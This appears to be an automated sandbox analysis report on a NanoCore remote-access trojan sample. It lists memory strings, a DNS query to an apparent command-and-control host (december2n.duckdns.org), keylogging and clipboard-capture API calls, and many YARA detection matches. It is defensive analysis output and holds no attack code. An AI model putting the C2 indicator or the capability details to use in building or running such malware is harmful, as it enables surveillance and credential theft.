Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RegSvcs.exe, 0000000D.00000002.636564713.000000000383A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004AEE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.651236156.0000000007AD0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: P05jmXYKpr.exe, 00000000.00000003.381445625.0000000003082000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.381359513.0000000003080000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, P05jmXYKpr.exe, 00000000.00000003.380745820.0000000003080000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: P05jmXYKpr.exe, 00000000.00000003.377814211.0000000007236000.00000004.00000020.00020000.00000000.sdmp, boaliim.dat.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown

DNS traffic detected: queries for: december2n.duckdns.org

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,

7_2_002CD7A1

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF6C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

7_2_002CF6C7

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002BA54A

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002CF45C

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002CF45C

Creates a DirectInput object (often for capturing keystrokes)

Source: boaliim.dat, 00000007.00000002.429505208.00000000017EA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Installs a raw input device (often for capturing keystrokes)

Source: RegSvcs.exe, 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

Potential key logger detected (key state polling based)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

7_2_002E9ED5

E-Banking Fraud

Yara detected Nanocore RAT

Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.boaliim.dat.192cc48.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4977af2.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.497c92f.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RegSvcs.exe.4982365.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.419593137.000000000192C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419481281.00000000018F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419137772.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.633014703.0000000001102000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.636564713.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419113322.000000000192D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419304447.0000000001964000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419527075.00000000042A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004829000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.649506775.0000000006D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.419176316.0000000001995000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.643242754.0000000004977000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: boaliim.dat PID: 7512, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7772, type: MEMORYSTR

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3850378.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b30000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7aa0000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d14629.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4982365.11.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b032d9.9.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4838611.10.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4b0f50d.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.1100000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.5ce0000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.192cc48.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ab0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ae0000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ac0000.24.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.37f43e4.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.3870bfc.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b60000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 7.3.boaliim.dat.1995c58.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7ad0000.25.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b00000.27.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b3e8a4.31.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4833fe8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6d10000.18.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7b10000.28.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a60000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.385c5c0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.4977af2.8.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.7a90000.21.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 13.2.RegSvcs.exe.6e80000.19.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 13.2.RegSvcs.exe.4833fe8.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
